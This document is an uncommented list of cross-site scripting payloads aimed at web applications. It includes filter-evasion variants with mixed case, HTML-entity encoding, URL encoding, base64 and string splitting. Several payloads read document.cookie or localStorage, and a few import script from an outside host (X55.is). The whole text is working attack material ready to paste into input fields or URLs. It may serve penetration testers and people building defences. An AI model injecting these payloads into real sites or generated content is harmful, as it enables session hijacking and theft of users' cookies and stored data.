"*prompt(document.domain)*"
*prompt(document.domain)*
<details open ontoggle="(()=>alert`ibrahimxss`)()"></details>
<iframe srcdoc="<img src=x onerror=alert(document.cookie)>"></iframe>
onerror="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;"
"><Svg/OnLoad=alert(1)>"@gmail.com
<A HRef=\" AutoFocusOnFocus=top/**/?.['al'%2B'ert'](1)>
</script>'"><img src=x onError=prompt(1)>
</script>%27"><img%20src=x%20onError=prompt(1)>
'<00 foo="<a%20href="javascript​:alert('XSS-Bypass')">XSS-CLick</00>--%20/
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
this.ownerDocument.defaultView['\u0061lert'](4)
confirm?.(1)
<img src=”invalid-image” onerror=”alert(document.cookie)”>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Base Href=//X55.is>
<K OnPointerRawUpdate=alert(1)>
 \’/alert(1)//
JavaScript:alert(1)
 ‘-alert(1)-’
<Script>alert(1)</Script>
<K ContentEditable AutoFocus OnFocus=alert(1)>
“AutoFocus OnFocus=alert(1)//
<Svg OnLoad=alert(1)>
<Img Src=//X55.is OnLoad=import(src)>
<base href="alert(1)" onfocus="a = /\/([^/]+)$/.exec(baseURI); eval(a[1]);" tabindex=1 style="display:block" autofocus></base><img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>
<img+src=oNlY=1+ onerror="alert(['a', 'x', 'b', 'x', 'c', 's'].map(c => c.replace(/[abc]/g, '')).join(''))">
<img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
?foobar=<foo%20bar=%250a%20onclick=<your js code>
?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
”/>&lt;script>alert(1)&lt;/script>”/>
<a href=[​]"​ onmouseover=prompt(1)//">XYZ</a>
//>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script //
<blink/onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>
<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script>
jaVasCript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>
<script>/&/-alert(1)</script>
<script>/&/-alert(1)</script>
%00%00%00%00%00%00%00<script>alert(1)</script>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9">
<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click
<script>http://alert.call(null,1)</script> (http://alert.call(%20, "XSS");)
<script>http://confirm.call(null,1)</script>
<script>http://prompt.call(null,1)</script>
<script>alert.apply(null, [1])</script>
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u
<svg onload=alert%26%230000000040"1")>
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"//Onx=""//onfocus=prompt(1)>"//Onx=""//%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
<script\x20type="text/javascript">javascript:alert(1);</script>
